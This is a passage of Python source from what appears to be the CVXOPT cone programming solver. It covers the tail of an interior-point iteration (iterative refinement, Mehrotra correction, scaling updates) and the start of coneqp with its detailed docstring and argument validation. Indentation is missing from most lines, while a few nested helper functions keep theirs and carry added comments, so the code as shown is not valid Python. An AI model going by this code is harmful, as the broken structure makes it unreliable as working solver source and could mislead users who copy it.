wx2, wy2 = xnewcopy(c), ynewcopy(b)
wz2, ws2 = matrix(0.0, (cdim, 1)), matrix(0.0, (cdim, 1))
wtau2, wkappa2 = matrix(0.0), matrix(0.0)
        def f6(x, y, z, tau, s, kappa):
            # Solve the same 6-variable system as f6_no_ir, but apply
            # `refinement` rounds of iterative refinement: after the direct
            # solve, compute the residual with res(), solve for a correction
            # with f6_no_ir, and add it in.  With DEBUG set, the final
            # residual norms are printed.  Arguments are overwritten in
            # place, exactly as in f6_no_ir.
            if refinement or DEBUG:
                # Keep an unmodified copy of the right-hand side; f6_no_ir
                # destroys its arguments.
                xcopy(x, wx)
                ycopy(y, wy)
                blas.copy(z, wz)
                wtau[0] = tau[0]
                blas.copy(s, ws)
                wkappa[0] = kappa[0]
            f6_no_ir(x, y, z, tau, s, kappa)
            for i in range(refinement):
                # (wx2, ..., wkappa2) := rhs - K * current_solution, then
                # solve for the correction and accumulate it.
                xcopy(wx, wx2)
                ycopy(wy, wy2)
                blas.copy(wz, wz2)
                wtau2[0] = wtau[0]
                blas.copy(ws, ws2)
                wkappa2[0] = wkappa[0]
                res(x, y, z, tau, s, kappa, wx2, wy2, wz2, wtau2, ws2,
                    wkappa2, W, dg, lmbda)
                f6_no_ir(wx2, wy2, wz2, wtau2, ws2, wkappa2)
                xaxpy(wx2, x)
                yaxpy(wy2, y)
                blas.axpy(wz2, z)
                tau[0] += wtau2[0]
                blas.axpy(ws2, s)
                kappa[0] += wkappa2[0]
            if DEBUG:
                res(x, y, z, tau, s, kappa, wx, wy, wz, wtau, ws, wkappa,
                    W, dg, lmbda)
                print("KKT residuals")
                print(" 'x': %e" %math.sqrt(xdot(wx, wx)))
                print(" 'y': %e" %math.sqrt(ydot(wy, wy)))
                print(" 'z': %e" %misc.snrm2(wz, dims))
                print(" 'tau': %e" %abs(wtau[0]))
                print(" 's': %e" %misc.snrm2(ws, dims))
                print(" 'kappa': %e" %abs(wkappa[0]))
mu = blas.nrm2(lmbda)**2 / (1 + cdim_diag)
sigma = 0.0
for i in [0,1]:
# Solve
#
# [ 0 ] [ 0 A' G' c ] [ dx ]
# [ 0 ] [ -A 0 0 b ] [ dy ]
# [ W'*ds ] - [ -G 0 0 h ] [ W^{-1}*dz ]
# [ dg*dkappa ] [ -c' -b' -h' 0 ] [ dtau/dg ]
#
# [ rx ]
# [ ry ]
# = - (1-sigma) [ rz ]
# [ rtau ]
#
# lmbda o (dz + ds) = -lmbda o lmbda + sigma*mu*e
# lmbdag * (dtau + dkappa) = - kappa * tau + sigma*mu
# ds = -lmbdasq if i is 0
# = -lmbdasq - dsa o dza + sigma*mu*e if i is 1
# dkappa = -lambdasq[-1] if i is 0
# = -lambdasq[-1] - dkappaa*dtaua + sigma*mu if i is 1.
blas.copy(lmbdasq, ds, n = dims['l'] + sum(dims['q']))
ind = dims['l'] + sum(dims['q'])
ind2 = ind
blas.scal(0.0, ds, offset = ind)
for m in dims['s']:
blas.copy(lmbdasq, ds, n = m, offsetx = ind2,
offsety = ind, incy = m+1)
ind += m*m
ind2 += m
dkappa[0] = lmbdasq[-1]
if i == 1:
blas.axpy(ws3, ds)
ds[:dims['l']] -= sigma*mu
ds[indq[:-1]] -= sigma*mu
ind = dims['l'] + sum(dims['q'])
ind2 = ind
for m in dims['s']:
ds[ind : ind+m*m : m+1] -= sigma*mu
ind += m*m
dkappa[0] += wkappa3 - sigma*mu
# (dx, dy, dz, dtau) = (1-sigma)*(rx, ry, rz, rt)
xcopy(rx, dx); xscal(1.0 - sigma, dx)
ycopy(ry, dy); yscal(1.0 - sigma, dy)
blas.copy(rz, dz); blas.scal(1.0 - sigma, dz)
dtau[0] = (1.0 - sigma) * rt
f6(dx, dy, dz, dtau, ds, dkappa)
# Save ds o dz and dkappa * dtau for Mehrotra correction
if i == 0:
blas.copy(ds, ws3)
misc.sprod(ws3, dz, dims)
wkappa3 = dtau[0] * dkappa[0]
# Maximum step to boundary.
#
# If i is 1, also compute eigenvalue decomposition of the 's'
# blocks in ds, dz. The eigenvectors Qs, Qz are stored in
# dsk, dzk. The eigenvalues are stored in sigs, sigz.
misc.scale2(lmbda, ds, dims)
misc.scale2(lmbda, dz, dims)
if i == 0:
ts = misc.max_step(ds, dims)
tz = misc.max_step(dz, dims)
else:
ts = misc.max_step(ds, dims, sigma = sigs)
tz = misc.max_step(dz, dims, sigma = sigz)
tt = -dtau[0] / lmbda[-1]
tk = -dkappa[0] / lmbda[-1]
t = max([ 0.0, ts, tz, tt, tk ])
if t == 0.0:
step = 1.0
else:
if i == 0:
step = min(1.0, 1.0 / t)
else:
step = min(1.0, STEP / t)
if i == 0:
sigma = (1.0 - step)**EXPON
# Update x, y.
xaxpy(dx, x, alpha = step)
yaxpy(dy, y, alpha = step)
# Replace 'l' and 'q' blocks of ds and dz with the updated
# variables in the current scaling.
# Replace 's' blocks of ds and dz with the factors Ls, Lz in a
# factorization Ls*Ls', Lz*Lz' of the updated variables in the
# current scaling.
# ds := e + step*ds for 'l' and 'q' blocks.
# dz := e + step*dz for 'l' and 'q' blocks.
blas.scal(step, ds, n = dims['l'] + sum(dims['q']))
blas.scal(step, dz, n = dims['l'] + sum(dims['q']))
ds[:dims['l']] += 1.0
dz[:dims['l']] += 1.0
ds[indq[:-1]] += 1.0
dz[indq[:-1]] += 1.0
# ds := H(lambda)^{-1/2} * ds and dz := H(lambda)^{-1/2} * dz.
#
# This replaces the 'l' and 'q' components of ds and dz with the
# updated variables in the current scaling.
# The 's' components of ds and dz are replaced with
#
# diag(lmbda_k)^{1/2} * Qs * diag(lmbda_k)^{1/2}
# diag(lmbda_k)^{1/2} * Qz * diag(lmbda_k)^{1/2}
#
misc.scale2(lmbda, ds, dims, inverse = 'I')
misc.scale2(lmbda, dz, dims, inverse = 'I')
# sigs := ( e + step*sigs ) ./ lambda for 's' blocks.
# sigz := ( e + step*sigz ) ./ lambda for 's' blocks.
blas.scal(step, sigs)
blas.scal(step, sigz)
sigs += 1.0
sigz += 1.0
blas.tbsv(lmbda, sigs, n = sum(dims['s']), k = 0, ldA = 1,
offsetA = dims['l'] + sum(dims['q']))
blas.tbsv(lmbda, sigz, n = sum(dims['s']), k = 0, ldA = 1,
offsetA = dims['l'] + sum(dims['q']))
# dsk := Ls = dsk * sqrt(sigs).
# dzk := Lz = dzk * sqrt(sigz).
ind2, ind3 = dims['l'] + sum(dims['q']), 0
for k in range(len(dims['s'])):
m = dims['s'][k]
for i in range(m):
blas.scal(math.sqrt(sigs[ind3+i]), ds, offset = ind2 + m*i,
n = m)
blas.scal(math.sqrt(sigz[ind3+i]), dz, offset = ind2 + m*i,
n = m)
ind2 += m*m
ind3 += m
# Update lambda and scaling.
misc.update_scaling(W, lmbda, ds, dz)
# For kappa, tau block:
#
# dg := sqrt( (kappa + step*dkappa) / (tau + step*dtau) )
# = dg * sqrt( (1 - step*tk) / (1 - step*tt) )
#
# lmbda[-1] := sqrt((tau + step*dtau) * (kappa + step*dkappa))
# = lmbda[-1] * sqrt(( 1 - step*tt) * (1 - step*tk))
dg *= math.sqrt(1.0 - step*tk) / math.sqrt(1.0 - step*tt)
dgi = 1.0 / dg
lmbda[-1] *= math.sqrt(1.0 - step*tt) * math.sqrt(1.0 - step*tk)
# Unscale s, z, tau, kappa (unscaled variables are used only to
# compute feasibility residuals).
blas.copy(lmbda, s, n = dims['l'] + sum(dims['q']))
ind = dims['l'] + sum(dims['q'])
ind2 = ind
for m in dims['s']:
blas.scal(0.0, s, offset = ind2)
blas.copy(lmbda, s, offsetx = ind, offsety = ind2, n = m,
incy = m+1)
ind += m
ind2 += m*m
misc.scale(s, W, trans = 'T')
blas.copy(lmbda, z, n = dims['l'] + sum(dims['q']))
ind = dims['l'] + sum(dims['q'])
ind2 = ind
for m in dims['s']:
blas.scal(0.0, z, offset = ind2)
blas.copy(lmbda, z, offsetx = ind, offsety = ind2, n = m,
incy = m+1)
ind += m
ind2 += m*m
misc.scale(z, W, inverse = 'I')
kappa, tau = lmbda[-1]/dgi, lmbda[-1]*dgi
gap = ( blas.nrm2(lmbda, n = lmbda.size[0]-1) / tau )**2
def coneqp(P, q, G = None, h = None, dims = None, A = None, b = None,
initvals = None, kktsolver = None, xnewcopy = None, xdot = None,
xaxpy = None, xscal = None, ynewcopy = None, ydot = None, yaxpy = None,
yscal = None, **kwargs):
"""
Solves a pair of primal and dual convex quadratic cone programs
minimize (1/2)*x'*P*x + q'*x
subject to G*x + s = h
A*x = b
s >= 0
maximize -(1/2)*(q + G'*z + A'*y)' * pinv(P) * (q + G'*z + A'*y)
- h'*z - b'*y
subject to q + G'*z + A'*y in range(P)
z >= 0.
The inequalities are with respect to a cone C defined as the Cartesian
product of N + M + 1 cones:
C = C_0 x C_1 x .... x C_N x C_{N+1} x ... x C_{N+M}.
The first cone C_0 is the nonnegative orthant of dimension ml.
The next N cones are 2nd order cones of dimension mq[0], ..., mq[N-1].
The second order cone of dimension m is defined as
{ (u0, u1) in R x R^{m-1} | u0 >= ||u1||_2 }.
The next M cones are positive semidefinite cones of order ms[0], ...,
ms[M-1] >= 0.
Input arguments (basic usage).
P is a dense or sparse 'd' matrix of size (n,n) with the lower
triangular part of the Hessian of the objective stored in the
lower triangle. Must be positive semidefinite.
q is a dense 'd' matrix of size (n,1).
dims is a dictionary with the dimensions of the components of C.
It has three fields.
- dims['l'] = ml, the dimension of the nonnegative orthant C_0.
(ml >= 0.)
- dims['q'] = mq = [ mq[0], mq[1], ..., mq[N-1] ], a list of N
integers with the dimensions of the second order cones
C_1, ..., C_N. (N >= 0 and mq[k] >= 1.)
- dims['s'] = ms = [ ms[0], ms[1], ..., ms[M-1] ], a list of M
integers with the orders of the semidefinite cones
C_{N+1}, ..., C_{N+M}. (M >= 0 and ms[k] >= 0.)
The default value of dims = {'l': G.size[0], 'q': [], 's': []}.
G is a dense or sparse 'd' matrix of size (K,n), where
K = ml + mq[0] + ... + mq[N-1] + ms[0]**2 + ... + ms[M-1]**2.
Each column of G describes a vector
v = ( v_0, v_1, ..., v_N, vec(v_{N+1}), ..., vec(v_{N+M}) )
in V = R^ml x R^mq[0] x ... x R^mq[N-1] x S^ms[0] x ... x S^ms[M-1]
stored as a column vector
[ v_0; v_1; ...; v_N; vec(v_{N+1}); ...; vec(v_{N+M}) ].
Here, if u is a symmetric matrix of order m, then vec(u) is the
matrix u stored in column major order as a vector of length m**2.
We use BLAS unpacked 'L' storage, i.e., the entries in vec(u)
corresponding to the strictly upper triangular entries of u are
not referenced.
h is a dense 'd' matrix of size (K,1), representing a vector in V,
in the same format as the columns of G.
A is a dense or sparse 'd' matrix of size (p,n). The default
value is a sparse 'd' matrix of size (0,n).
b is a dense 'd' matrix of size (p,1). The default value is a
dense 'd' matrix of size (0,1).
initvals is a dictionary with optional primal and dual starting
points initvals['x'], initvals['s'], initvals['y'], initvals['z'].
- initvals['x'] is a dense 'd' matrix of size (n,1).
- initvals['s'] is a dense 'd' matrix of size (K,1), representing
a vector that is strictly positive with respect to the cone C.
- initvals['y'] is a dense 'd' matrix of size (p,1).
- initvals['z'] is a dense 'd' matrix of size (K,1), representing
a vector that is strictly positive with respect to the cone C.
A default initialization is used for the variables that are not
specified in initvals.
It is assumed that rank(A) = p and rank([P; A; G]) = n.
The other arguments are normally not needed. They make it possible
to exploit certain types of structure, as described below.
Output arguments.
Returns a dictionary with keys 'status', 'x', 's', 'z', 'y',
'primal objective', 'dual objective', 'gap', 'relative gap',
'primal infeasibility', 'dual infeasibility', 'primal slack',
'dual slack', 'iterations'.
The 'status' field has values 'optimal' or 'unknown'. 'iterations'
is the number of iterations taken.
If the status is 'optimal', 'x', 's', 'y', 'z' are an approximate
solution of the primal and dual optimality conditions
G*x + s = h, A*x = b
P*x + G'*z + A'*y + q = 0
s >= 0, z >= 0
s'*z = 0.
If the status is 'unknown', 'x', 'y', 's', 'z' are the last
iterates before termination. These satisfy s > 0 and z > 0,
but are not necessarily feasible.
The values of the other fields are defined as follows.
- 'primal objective': the primal objective (1/2)*x'*P*x + q'*x.
- 'dual objective': the dual objective
L(x,y,z) = (1/2)*x'*P*x + q'*x + z'*(G*x - h) + y'*(A*x-b).
- 'gap': the duality gap s'*z.
- 'relative gap': the relative gap, defined as
gap / -primal objective
if the primal objective is negative,
gap / dual objective
if the dual objective is positive, and None otherwise.
- 'primal infeasibility': the residual in the primal constraints,
defined as the maximum of the residual in the inequalities
|| G*x + s + h || / max(1, ||h||)
and the residual in the equalities
|| A*x - b || / max(1, ||b||).
- 'dual infeasibility': the residual in the dual constraints,
defined as
|| P*x + G'*z + A'*y + q || / max(1, ||q||).
- 'primal slack': the smallest primal slack, sup {t | s >= t*e },
where
e = ( e_0, e_1, ..., e_N, e_{N+1}, ..., e_{M+N} )
is the identity vector in C. e_0 is an ml-vector of ones,
e_k, k = 1,..., N, is the unit vector (1,0,...,0) of length
mq[k], and e_k = vec(I) where I is the identity matrix of order
ms[k].
- 'dual slack': the smallest dual slack, sup {t | z >= t*e }.
If the exit status is 'optimal', then the primal and dual
infeasibilities are guaranteed to be less than
solvers.options['feastol'] (default 1e-7). The gap is less than
solvers.options['abstol'] (default 1e-7) or the relative gap is
less than solvers.options['reltol'] (default 1e-6).
Termination with status 'unknown' indicates that the algorithm
failed to find a solution that satisfies the specified tolerances.
In some cases, the returned solution may be fairly accurate. If
the primal and dual infeasibilities, the gap, and the relative gap
are small, then x, y, s, z are close to optimal.
Advanced usage.
Three mechanisms are provided to express problem structure.
1. The user can provide a customized routine for solving linear
equations (`KKT systems')
[ P A' G' ] [ ux ] [ bx ]
[ A 0 0 ] [ uy ] = [ by ].
[ G 0 -W'*W ] [ uz ] [ bz ]
W is a scaling matrix, a block diagonal mapping
W*u = ( W0*u_0, ..., W_{N+M}*u_{N+M} )
defined as follows.
- For the 'l' block (W_0):
W_0 = diag(d),
with d a positive vector of length ml.
- For the 'q' blocks (W_{k+1}, k = 0, ..., N-1):
W_{k+1} = beta_k * ( 2 * v_k * v_k' - J )
where beta_k is a positive scalar, v_k is a vector in R^mq[k]
with v_k[0] > 0 and v_k'*J*v_k = 1, and J = [1, 0; 0, -I].
- For the 's' blocks (W_{k+N}, k = 0, ..., M-1):
W_k * u = vec(r_k' * mat(u) * r_k)
where r_k is a nonsingular matrix of order ms[k], and mat(x) is
the inverse of the vec operation.
The optional argument kktsolver is a Python function that will be
called as g = kktsolver(W). W is a dictionary that contains
the parameters of the scaling:
- W['d'] is a positive 'd' matrix of size (ml,1).
- W['di'] is a positive 'd' matrix with the elementwise inverse of
W['d'].
- W['beta'] is a list [ beta_0, ..., beta_{N-1} ]
- W['v'] is a list [ v_0, ..., v_{N-1} ]
- W['r'] is a list [ r_0, ..., r_{M-1} ]
- W['rti'] is a list [ rti_0, ..., rti_{M-1} ], with rti_k the
inverse of the transpose of r_k.
The call g = kktsolver(W) should return a function g that solves
the KKT system by g(x, y, z). On entry, x, y, z contain the
righthand side bx, by, bz. On exit, they contain the solution,
with uz scaled, the argument z contains W*uz. In other words,
on exit x, y, z are the solution of
[ P A' G'*W^{-1} ] [ ux ] [ bx ]
[ A 0 0 ] [ uy ] = [ by ].
[ G 0 -W' ] [ uz ] [ bz ]
2. The linear operators P*u, G*u and A*u can be specified
by providing Python functions instead of matrices. This can only
be done in combination with 1. above, i.e., it requires the
kktsolver argument.
If P is a function, the call P(u, v, alpha, beta) should evaluate
the matrix-vectors product
v := alpha * P * u + beta * v.
The arguments u and v are required. The other arguments have
default values alpha = 1.0, beta = 0.0.
If G is a function, the call G(u, v, alpha, beta, trans) should
evaluate the matrix-vector products
v := alpha * G * u + beta * v if trans is 'N'
v := alpha * G' * u + beta * v if trans is 'T'.
The arguments u and v are required. The other arguments have
default values alpha = 1.0, beta = 0.0, trans = 'N'.
If A is a function, the call A(u, v, alpha, beta, trans) should
evaluate the matrix-vectors products
v := alpha * A * u + beta * v if trans is 'N'
v := alpha * A' * u + beta * v if trans is 'T'.
The arguments u and v are required. The other arguments
have default values alpha = 1.0, beta = 0.0, trans = 'N'.
3. Instead of using the default representation of the primal
variable x and the dual variable y as one-column 'd' matrices,
we can represent these variables and the corresponding parameters
q and b by arbitrary Python objects (matrices, lists, dictionaries,
etc). This can only be done in combination with 1. and 2. above,
i.e., it requires a user-provided KKT solver and an operator
description of the linear mappings. It also requires the
arguments xnewcopy, xdot, xscal, xaxpy, ynewcopy, ydot, yscal,
yaxpy. These arguments are functions defined as follows.
If X is the vector space of primal variables x, then:
- xnewcopy(u) creates a new copy of the vector u in X.
- xdot(u, v) returns the inner product of two vectors u and v in X.
- xscal(alpha, u) computes u := alpha*u, where alpha is a scalar
and u is a vector in X.
- xaxpy(u, v, alpha = 1.0) computes v := alpha*u + v for a scalar
alpha and two vectors u and v in X.
If this option is used, the argument q must be in the same format
as x, the argument P must be a Python function, the arguments A
and G must be Python functions or None, and the argument
kktsolver is required.
If Y is the vector space of primal variables y:
- ynewcopy(u) creates a new copy of the vector u in Y.
- ydot(u, v) returns the inner product of two vectors u and v in Y.
- yscal(alpha, u) computes u := alpha*u, where alpha is a scalar
and u is a vector in Y.
- yaxpy(u, v, alpha = 1.0) computes v := alpha*u + v for a scalar
alpha and two vectors u and v in Y.
If this option is used, the argument b must be in the same format
as y, the argument A must be a Python function or None, and the
argument kktsolver is required.
Control parameters.
The following control parameters can be modified by adding an
entry to the dictionary options.
options['show_progress'] True/False (default: True)
options['maxiters'] positive integer (default: 100)
options['refinement'] nonnegative integer (default: 0 for problems
with no second-order cone and matrix inequality constraints;
1 otherwise)
options['abstol'] scalar (default: 1e-7)
options['reltol'] scalar (default: 1e-6)
options['feastol'] scalar (default: 1e-7).
"""
import math
from cvxopt import base, blas, misc
from cvxopt.base import matrix, spmatrix
STEP = 0.99
EXPON = 3
options = kwargs.get('options',globals()['options'])
DEBUG = options.get('debug',False)
KKTREG = options.get('kktreg',None)
if KKTREG is None:
pass
elif not isinstance(KKTREG,(float,int,long)) or KKTREG < 0.0:
raise ValueError("options['kktreg'] must be a nonnegative scalar")
# Use Mehrotra correction or not.
correction = options.get('use_correction', True)
MAXITERS = options.get('maxiters',100)
if not isinstance(MAXITERS,(int,long)) or MAXITERS < 1:
raise ValueError("options['maxiters'] must be a positive integer")
ABSTOL = options.get('abstol',1e-7)
if not isinstance(ABSTOL,(float,int,long)):
raise ValueError("options['abstol'] must be a scalar")
RELTOL = options.get('reltol',1e-6)
if not isinstance(RELTOL,(float,int,long)):
raise ValueError("options['reltol'] must be a scalar")
if RELTOL <= 0.0 and ABSTOL <= 0.0 :
raise ValueError("at least one of options['reltol'] and " \
"options['abstol'] must be positive")
FEASTOL = options.get('feastol',1e-7)
if not isinstance(FEASTOL,(float,int,long)) or FEASTOL <= 0.0:
raise ValueError("options['feastol'] must be a positive scalar")
show_progress = options.get('show_progress',True)
if kktsolver is None:
if dims and (dims['q'] or dims['s']):
kktsolver = 'chol'
else:
kktsolver = 'chol2'
defaultsolvers = ('ldl', 'ldl2', 'chol', 'chol2')
if isinstance(kktsolver,str) and kktsolver not in defaultsolvers:
raise ValueError("'%s' is not a valid value for kktsolver" \
%kktsolver)
# Argument error checking depends on level of customization.
customkkt = not isinstance(kktsolver,str)
matrixP = isinstance(P, (matrix, spmatrix))
matrixG = isinstance(G, (matrix, spmatrix))
matrixA = isinstance(A, (matrix, spmatrix))
if (not matrixP or (not matrixG and G is not None) or
(not matrixA and A is not None)) and not customkkt:
raise ValueError("use of function valued P, G, A requires a "\
"user-provided kktsolver")
customx = (xnewcopy != None or xdot != None or xaxpy != None or
xscal != None)
if customx and (matrixP or matrixG or matrixA or not customkkt):
raise ValueError("use of non-vector type for x requires "\
"function valued P, G, A and user-provided kktsolver")
customy = (ynewcopy != None or ydot != None or yaxpy != None or
yscal != None)
if customy and (matrixA or not customkkt):
raise ValueError("use of non vector type for y requires "\
"function valued A and user-provided kktsolver")
if not customx and (not isinstance(q,matrix) or q.typecode != 'd' or q.size[1] != 1):
raise TypeError("'q' must be a 'd' matrix with one column")
if matrixP:
if P.typecode != 'd' or P.size != (q.size[0], q.size[0]):
raise TypeError("'P' must be a 'd' matrix of size (%d, %d)"\
%(q.size[0], q.size[0]))
def fP(x, y, alpha = 1.0, beta = 0.0):
    # y := alpha * P * x + beta * y for matrix-valued P.
    # P is symmetric, so the symmetric matrix-vector product applies.
    base.symv(P, x, y, alpha = alpha, beta = beta)
else:
fP = P
if h is None: h = matrix(0.0, (0,1))
if not isinstance(h, matrix) or h.typecode != 'd' or h.size[1] != 1:
raise TypeError("'h' must be a 'd' matrix with one column")
if not dims: dims = {'l': h.size[0], 'q': [], 's': []}
if not isinstance(dims['l'],(int,long)) or dims['l'] < 0:
raise TypeError("'dims['l']' must be a nonnegative integer")
if [ k for k in dims['q'] if not isinstance(k,(int,long)) or k < 1 ]:
raise TypeError("'dims['q']' must be a list of positive integers")
if [ k for k in dims['s'] if not isinstance(k,(int,long)) or k < 0 ]:
raise TypeError("'dims['s']' must be a list of nonnegative " \
"integers")
try: refinement = options['refinement']
except KeyError:
if dims['q'] or dims['s']: refinement = 1
else: refinement = 0
else:
if not isinstance(refinement,(int,long)) or refinement < 0:
raise ValueError("options['refinement'] must be a "\
"nonnegative integer")
cdim = dims['l'] + sum(dims['q']) + sum([ k**2 for k in dims['s'] ])
if h.size[0] != cdim:
raise TypeError("'h' must be a 'd' matrix of size (%d,1)" %cdim)
# Data for kth 'q' constraint are found in rows indq[k]:indq[k+1] of G.
indq = [ dims['l'] ]
for k in dims['q']: indq = indq + [ indq[-1] + k ]
# Data for kth 's' constraint are found in rows inds[k]:inds[k+1] of G.
inds = [ indq[-1] ]
for k in dims['s']: inds = inds + [ inds[-1] + k**2 ]
if G is None:
if customx:
def G(x, y, trans = 'N', alpha = 1.0, beta = 0.0):
    # Operator for an absent G with custom x: G has zero rows, so
    # G*x is empty ('N' is a no-op) and G'*u contributes nothing,
    # leaving only the y := beta*y scaling in the 'T' case.
    if trans == 'N': pass
    else: xscal(beta, y)
else:
G = spmatrix([], [], [], (0, q.size[0]))
matrixG = True
if matrixG:
if G.typecode != 'd' or G.size != (cdim, q.size[0]):
raise TypeError("'G' must be a 'd' matrix of size (%d, %d)"\
%(cdim, q.size[0]))
def fG(x, y, trans = 'N', alpha = 1.0, beta = 0.0):
    # y := alpha * G * x + beta * y (or alpha * G' * x + beta * y if
    # trans == 'T'), using the cone-structured gemv that understands
    # the row layout given by dims.
    misc.sgemv(G, x, y, dims, trans = trans, alpha = alpha,
        beta = beta)
else:
fG = G
if A is None:
if customx or customy:
def A(x, y, trans = 'N', alpha = 1.0, beta = 0.0):
    # Operator for an absent A with custom x or y: A has zero rows,
    # so A*x is empty ('N' is a no-op) and A'*u contributes nothing,
    # leaving only the y := beta*y scaling in the 'T' case.
    if trans == 'N': pass
    else: xscal(beta, y)
else:
A = spmatrix([], [], [], (0, q.size[0]))
matrixA = True
if matrixA:
if A.typecode != 'd' or A.size[1] != q.size[0]:
raise TypeError("'A' must be a 'd' matrix with %d columns" \
%q.size[0])
def fA(x, y, trans = 'N', alpha = 1.0, beta = 0.0):
    # y := alpha * A * x + beta * y (or alpha * A' * x + beta * y
    # if trans == 'T') for matrix-valued A.
    base.gemv(A, x, y, trans = trans, alpha = alpha, beta = beta)
else:
fA = A
if not customy:
if b is None: b = matrix(0.0, (0,1))
if not isinstance(b, matrix) or b.typecode != 'd' or b.size[1] != 1:
raise TypeError("'b' must be a 'd' matrix with one column")
if matrixA and b.size[0] != A.size[0]:
raise TypeError("'b' must have length %d" %A.size[0])
# A custom y representation has no usable default for b, so it must
# be supplied explicitly.  (Fixed: the exception name was misspelled
# 'ValueEror', which would have raised NameError instead.)
if b is None and customy:
    raise ValueError("use of non-vector type for y requires b")
ws3, wz3 = matrix(0.0, (cdim,1 )), matrix(0.0, (cdim,1 ))
def res(ux, uy, uz, us, vx, vy, vz, vs, W, lmbda):
    # Evaluates the residual in the Newton equations, overwriting
    # vx, vy, vz, vs in place (wz3/ws3 are used as scratch storage):
    #
    #     [ vx ]    [ vx ]   [ 0     ]   [ P  A'  G' ]   [ ux        ]
    #     [ vy ] := [ vy ] - [ 0     ] - [ A  0   0  ] * [ uy        ]
    #     [ vz ]    [ vz ]   [ W'*us ]   [ G  0   0  ]   [ W^{-1}*uz ]
    #
    #     vs := vs - lmbda o (uz + us).

    # vx := vx - P*ux - A'*uy - G'*W^{-1}*uz
    fP(ux, vx, alpha = -1.0, beta = 1.0)
    fA(uy, vx, alpha = -1.0, beta = 1.0, trans = 'T')
    blas.copy(uz, wz3)
    misc.scale(wz3, W, inverse = 'I')
    fG(wz3, vx, alpha = -1.0, beta = 1.0, trans = 'T')

    # vy := vy - A*ux
    fA(ux, vy, alpha = -1.0, beta = 1.0)

    # vz := vz - G*ux - W'*us
    fG(ux, vz, alpha = -1.0, beta = 1.0)
    blas.copy(us, ws3)
    misc.scale(ws3, W, trans = 'T')
    blas.axpy(ws3, vz, alpha = -1.0)

    # vs := vs - lmbda o (uz + us)
    blas.copy(us, ws3)
    blas.axpy(uz, ws3)
    misc.sprod(ws3, lmbda, dims, diag = 'D')
    blas.axpy(ws3, vs, alpha = -1.0)
# kktsolver(W) returns a routine for solving
#
# [ P A' G'*W^{-1} ] [ ux ] [ bx ]
# [ A 0 0 ] [ uy ] = [ by ].
# [ G 0 -W' ] [ uz ] [ bz ]
if kktsolver in defaultsolvers:
if KKTREG is None and b.size[0] > q.size[0]:
raise ValueError("Rank(A) < p or Rank([P; G; A]) < n")
if kktsolver == 'ldl':
factor = misc.kkt_ldl(G, dims, A, kktreg = KKTREG)
elif kktsolver == 'ldl2':
factor = misc.kkt_ldl2(G, dims, A)
elif kktsolver == 'chol':
factor = misc.kkt_chol(G, dims, A)
else:
factor = misc.kkt_chol2(G, dims, A)
def kktsolver(W):
    # Wrap the selected default factorization so that kktsolver(W)
    # returns a solve routine for the current scaling W.  P is fixed
    # for the lifetime of the problem, so it is bound here.
    return factor(W, P)
if xnewcopy is None: xnewcopy = matrix
if xdot is None: xdot = blas.dot
if xaxpy is None: xaxpy = blas.axpy
if xscal is None: xscal = blas.scal
def xcopy(x, y):
    # y := x in the (possibly user-defined) vector space X,
    # expressed via the user-supplied primitives:
    # y := 0*y followed by y := x + y.
    xscal(0.0, y)
    xaxpy(x, y)
if ynewcopy is None: ynewcopy = matrix
if ydot is None: ydot = blas.dot
if yaxpy is None: yaxpy = blas.axpy
if yscal is None: yscal = blas.scal
def ycopy(x, y):
    # y := x in the (possibly user-defined) vector space Y,
    # expressed via the user-supplied primitives:
    # y := 0*y followed by y := x + y.
    yscal(0.0, y)
    yaxpy(x, y)
resx0 = max(1.0, math.sqrt(xdot(q,q)))
resy0 = max(1.0, math.sqrt(ydot(b,b)))
resz0 = max(1.0, misc.snrm2(h, dims))
if cdim == 0:
# Solve
#
# [ P A' ] [ x ] [ -q ]
# [ ] [ ] = [ ].
# [ A 0 ] [ y ] [ b ]
try: f3 = kktsolver({'d': matrix(0.0, (0,1)), 'di':
matrix(0.0, (0,1)), 'beta': [], 'v': [], 'r': [], 'rti': []})
except ArithmeticError:
raise ValueError("Rank(A) < p or Rank([P; A; G]) < n")
x = xnewcopy(q)
xscal(-1.0, x)
y = ynewcopy(b)
f3(x, y, matrix(0.0, (0,1)))
# dres = || P*x + q + A'*y || / resx0
rx = xnewcopy(q)
fP(x, rx, beta = 1.0)
pcost = 0.5 * (xdot(x, rx) + xdot(x, q))
fA(y, rx, beta = 1.0, trans = 'T')
dres = math.sqrt(xdot(rx, rx)) / resx0
# pres = || A*x - b || / resy0
ry = ynewcopy(b)
fA(x, ry, alpha = 1.0, beta = -1.0)
pres = math.sqrt(ydot(ry, ry)) / resy0
if pcost == 0.0: relgap = None
else: relgap = 0.0
return { 'status': 'optimal', 'x': x, 'y': y, 'z':
matrix(0.0, (0,1)), 's': matrix(0.0, (0,1)),
'gap': 0.0, 'relative gap': 0.0,
'primal objective': pcost,
'dual objective': pcost,
'primal slack': 0.0, 'dual slack': 0.0,
'primal infeasibility': pres, 'dual infeasibility': dres,
'iterations': 0 }
x, y = xnewcopy(q), ynewcopy(b)
s, z = matrix(0.0, (cdim, 1)), matrix(0.0, (cdim, 1))
if initvals is None:
# Factor
#
# [ P A' G' ]
# [ A 0 0 ].
# [ G 0 -I ]
W = {}
W['d'] = matrix(1.0, (dims['l'], 1))
W['di'] = matrix(1.0, (dims['l'], 1))
W['v'] = [ matrix(0.0, (m,1)) for m in dims['q'] ]
W['beta'] = len(dims['q']) * [ 1.0 ]
for v in W['v']: v[0] = 1.0
W['r'] = [ matrix(0.0, (m,m)) for m in dims['s'] ]
W['rti'] = [ matrix(0.0, (m,m)) for m in dims['s'] ]
for r in W['r']: r[::r.size[0]+1 ] = 1.0
for rti in W['rti']: rti[::rti.size[0]+1 ] = 1.0
try: f = kktsolver(W)
except ArithmeticError:
raise ValueError("Rank(A) < p or Rank([P; A; G]) < n")
# Solve
#
# [ P A' G' ] [ x ] [ -q ]
# [ A 0 0 ] * [ y ] = [ b ].
# [ G 0 -I ] [ z ] [ h ]
xcopy(q, x)
xscal(-1.0, x)
ycopy(b, y)
blas.copy(h, z)
try: f(x, y, z)
except ArithmeticError:
raise ValueError("Rank(A) < p or Rank([P; G; A]) < n")
blas.copy(z, s)
blas.scal(-1.0, s)
nrms = misc.snrm2(s, dims)
ts = misc.max_step(s, dims)
if ts >= -1e-8 * max(nrms, 1.0):
a = 1.0 + ts
s[:dims['l']] += a
s[indq[:-1]] += a
ind = dims['l'] + sum(dims['q'])
for m in dims['s']:
s[ind : ind+m*m : m+1] += a
ind += m**2
nrmz = misc.snrm2(z, dims)
tz = misc.max_step(z, dims)
